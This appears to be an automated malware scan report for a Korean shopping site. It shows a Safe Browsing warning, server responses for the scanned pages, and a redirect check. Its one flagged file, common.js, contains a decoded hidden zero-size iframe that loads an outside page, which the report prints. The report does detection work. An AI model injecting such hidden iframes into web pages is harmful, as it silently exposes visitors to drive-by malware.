Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zzi33.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://zzi33.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 05:21:06 GMT Location: shop/index.php Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/4.4.9 mod_watch/4.3 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/4.4.9 | clean |
http://zzi33.com/shop/index.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 22 Dec 2014 05:21:08 GMT Pragma: no-cache Location: main/index.php Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/4.4.9 mod_watch/4.3 Content-Length: 0 Content-Type: text/html; charset=EUC-KR Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 22 Dec 2014 05:21:08 GMT P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Set-Cookie: PHPSESSID=425deae64c2b9dc6a5ec70555af2daeb; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://zzi33.com/shop/main/index.php | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 22 Dec 2014 05:21:08 GMT Pragma: no-cache Location: http://www.zzi33.com/shop/main/index.php Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/4.4.9 mod_watch/4.3 Content-Length: 0 Content-Type: text/html; charset=EUC-KR Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Mon, 22 Dec 2014 05:21:08 GMT P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Set-Cookie: PHPSESSID=f9541623a2a3439c70b51ff800661231; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://www.zzi33.com/shop/main/index.php | 200 OK Content-Length: 66037 Content-Type: text/html | clean |
http://www.zzi33.com/shop/data/skin/siesta_foodmall/common.js | 200 OK Content-Length: 33596 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. function _ID(obj){return document.getElementById(obj)}
function popup_zipcode(form) { window.open("../proc/popup_zipcode.php?form="+form,"","width=400,height=500"); } function chkForm(form) { if (typeof(mini_obj)!="undefined" || document.getElementById('_mini_oHTML')) mini_editor_submit(); var reschk = 0; for (i=0;i<form.elements.length;i++){ currEl = form.elem ...[4071 bytes skipped]... Decoded script: <iframe src=http://bomnal3040.com/flash/index.html width=0 height=0></iframe> | ||
http://zzi33.com/../member/login.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/test404page.js | 404 Not Found Content-Length: 356 Content-Type: text/html | clean |
http://zzi33.com/../member/join.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../goods/goods_cart.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../mypage/mypage_orderlist.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../service/customer.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../member/myinfo.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../mypage/mypage_wishlist.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../mypage/mypage_today.php | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../goods/goods_list.php?category=001 | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../goods/goods_list.php?category=001016 | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../goods/goods_list.php?category=001008 | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
http://zzi33.com/../goods/goods_list.php?category=001012 | 400 Bad Request Content-Length: 370 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zzi33.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 05:21:06 GMT
Location: shop/index.php
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/4.4.9 mod_watch/4.3
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/4.4.9
...0 bytes of data.
GET / HTTP/1.1
Host: zzi33.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 05:21:06 GMT
Location: shop/index.php
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/4.4.9 mod_watch/4.3
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/4.4.9
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zzi33.com
Referer: http://www.google.com/search?q=zzi33.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zzi33.com
Referer: http://www.google.com/search?q=zzi33.com
Result:
The result is similar to the first query. There are no suspicious redirects found.